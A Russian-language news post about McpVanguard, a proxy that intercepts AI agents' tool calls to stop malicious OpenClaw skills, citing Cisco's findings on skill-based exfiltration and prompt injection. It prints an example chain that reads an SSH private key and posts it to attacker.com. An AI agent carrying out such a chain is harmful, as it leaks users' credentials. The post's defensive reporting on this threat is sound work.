Прокси-сервер McpVanguard блокирует эксфильтрацию данных навыка OpenClaw

✍️ OpenClawRadar📅 Опубликовано: 20 марта 2026 г.🔗 Source
Прокси-сервер McpVanguard блокирует эксфильтрацию данных навыка OpenClaw
Ad

В ответ на обнаружение командой безопасности ИИ Cisco сторонних навыков OpenClaw, выполняющих скрытую утечку данных и инъекцию промптов, разработчик выпустил McpVanguard — прокси, предназначенный для размещения между ИИ-агентом и его инструментами, чтобы блокировать вредоносные вызовы до их выполнения.

Проблема: Цепочки вредоносных вызовов

Проблема безопасности заключается не в ошибке самого OpenClaw, а в последствиях предоставления агентам доступа к файловой системе, выполнения команд оболочки и сетевых вызовов без границ принуждения. Тестирование Cisco выявило схему, когда, казалось бы, безобидные отдельные вызовы объединяются для создания утечки, например:

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

Ни один из вызовов по отдельности не выглядит вредоносным, но вместе они приводят к утечке конфиденциальных данных. Согласно источнику, на пике в ClawHub было более 820 вредоносных навыков, а уязвимость CVE-2026-25253 позволяла злоумышленникам добиться удалённого выполнения кода через одну вредоносную ссылку. Текущая проверка на уровне навыков не позволяет обнаружить такие цепочки вызовов.

Ad

Решение: Прокси McpVanguard

McpVanguard решает эту проблему, перехватывая вызовы между агентом и его инструментами. Он использует три метода обнаружения:

  • Сопоставление с образцом
  • Оценка семантического намерения
  • Обнаружение поведенческих цепочек за всю сессию

Установка осуществляется через pip: pip install mcp-vanguard.

Более глубокий слой: Протокол VEX

Проект включает более глубокий слой безопасности под названием VEX Protocol, описанный как система «бортового самописца». Он предоставляет:

  • Аудит-трейлы Меркла для журналирования с защитой от несанкционированного изменения
  • Верификацию идентичности агента, основанную на TPM
  • Принуждение на уровне системных вызовов

Протокол VEX написан на Rust, и его разработка началась в декабре 2023 года, до того как OpenClaw получил широкую популярность. В источнике отмечается, что NVIDIA недавно выпустила NemoClaw для аналогичных целей безопасности, что указывает на то, что угрозы такого типа никуда не исчезнут.

Оба проекта доступны на GitHub:

📖 Read the full source: r/openclaw

Ad

👀 Смотрите также

Выход Agent-Drift Security Tool версии 0.1.2: Шаг вперед в области безопасности ИИ
Безопасность

Выход Agent-Drift Security Tool версии 0.1.2: Шаг вперед в области безопасности ИИ

Инструмент безопасности Agent-Drift v0.1.2 теперь доступен, предлагая улучшенные функции безопасности для кодирующих агентов ИИ. Этот обновленный вариант решает ключевые проблемы безопасности в автоматизации.

OpenClawRadar
Плагин SupraWall MCP блокирует атаки внедрения промптов в локальных ИИ-агентах.
Безопасность

Плагин SupraWall MCP блокирует атаки внедрения промптов в локальных ИИ-агентах.

SupraWall — это плагин MCP, который перехватывает и блокирует попытки утечки конфиденциальных данных от ИИ-агентов, что было продемонстрировано в ходе испытания «красной командой», где он предотвратил утечку учетных данных через атаки внедрения промптов.

OpenClawRadar
Исследователи в области ИИ-безопасности: ваши уязвимости нулевого дня могут быть раскрыты через функцию согласия на передачу данных
Безопасность

Исследователи в области ИИ-безопасности: ваши уязвимости нулевого дня могут быть раскрыты через функцию согласия на передачу данных

Переключатель 'Улучшить модель для всех' в интерфейсах LLM может автоматически собирать глубокие исследования red-teaming, отправляя ваши концепции уязвимостей командам безопасности поставщиков и потенциально в академические статьи до вашей публикации. Отключите обмен данными перед проведением серьёзных исследований безопасности.

OpenClawRadar
Ошибка плагина Claude Code вызывает скачки потребления процессора и разрядку аккумулятора.
Безопасность

Ошибка плагина Claude Code вызывает скачки потребления процессора и разрядку аккумулятора.

Пользователь обнаружил, что плагин Claude Code для Telegram создает несколько процессов bun.exe, которые работают на 100% загрузки ЦП даже при закрытой крышке ноутбука, вызывая быстрый разряд батареи. Процессы сохраняются после циклов сна/пробуждения и требуют специальных шагов для удаления.

OpenClawRadar